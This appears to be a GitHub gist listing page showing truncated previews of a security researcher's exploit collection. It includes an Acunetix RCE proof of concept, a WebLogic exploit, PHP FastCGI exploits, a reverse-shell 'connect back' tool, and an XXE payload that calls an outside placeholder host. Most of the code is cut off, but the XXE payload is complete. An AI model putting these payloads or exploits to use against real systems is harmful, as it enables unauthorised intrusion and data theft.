wofeiwo
/ build.sh
Created
February 7, 2018 07:59
— forked from FiloSottile/build.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/sh | |
| GOOS=linux go build -o $2 "$1" | |
| GOOS=linux go build -ldflags="-s -w" -o $2.-sw "$1" | |
| upx -f --brute -o $2.upx $2 | |
| upx -f --brute -o $2.-sw.upx $2.-sw | |
| GOOS=linux gotip build -o $2.tip "$1" | |
| GOOS=linux gotip build -ldflags="-s -w" -o $2.tip.-sw "$1" | |
| upx -f --brute -o $2.tip.upx $2.tip |
wofeiwo
/ acu0day.py
Created
December 29, 2017 02:57
Acunetix 0day RCE - (SYSTEM) Acunetix 0day RCE #Usage Run script with dzonerzy:dvm dzonerzy$ python /Users/dzonerzy/PycharmProjects/natbypass/acu0day.py 9999 172.16.24.1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| """ | |
| Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa | |
| This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is | |
| a LPE (Local Privilege Escalation). | |
| All credits for this exploit goes to Daniele Linguaglossa | |
| """ |
wofeiwo
/ Weblogic_WLS_exp.py
Created
December 28, 2017 02:51
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| def payload_command (command_in): | |
| html_escape_table = { | |
| "&": "&", | |
| '"': """, |
wofeiwo
/ XXE_payloads
Created
September 19, 2017 09:44
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # coding: utf-8 | |
| # Author: [email protected] | |
| # Last modified: 2017-7-18 | |
| # Note: Just for research purpose | |
| import sys | |
| import socket | |
| import argparse | |
| import requests |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "flag" | |
| "fmt" | |
| "io" | |
| "io/ioutil" | |
| "os" | |
| "path/filepath" | |
| "strconv" |
wofeiwo
/ py-wget.py
Created
May 31, 2017 10:27
python version wget, need `pip install requests` first
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # encoding=utf-8 | |
| import requests, sys, os, re, time | |
| from optparse import OptionParser | |
| class wget: | |
| def __init__(self, config = {}): | |
| self.config = { | |
| 'block': int(config['block'] if config.has_key('block') else 1024), | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // PHP FactCGI remote exploit | |
| // Date: 2012-09-15 | |
| // Author: [email protected] | |
| // Note: Just for research purpose | |
| package main | |
| import ( | |
| "./fcgiclient" | |
| "fmt" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Connect back tools | |
| compile under linux | |
| 2003-07-11 now support FreeBSD .. | |
| now support user define echo value | |
| [bkbll@mobile bkbll]$ uname -a | |
| Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown | |
| %uname -a | |
| FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 [email protected]:/usr/src/sys/compile/GENERIC i386 | |
| [bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * PHP 5.3.3+ FASTCGI jailbreak | |
| * | |
| * @author wofeiwo <wofeiwo#80sec.com> | |
| * @date 2013-01-23 | |
| * @version 1.0 | |
| * @reference https://bugs.php.net/bug.php?id=64103 | |
| * @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese) | |
| * @note disable php security settings, but can't overwrite disable_function/disable_classes. |
NewerOlder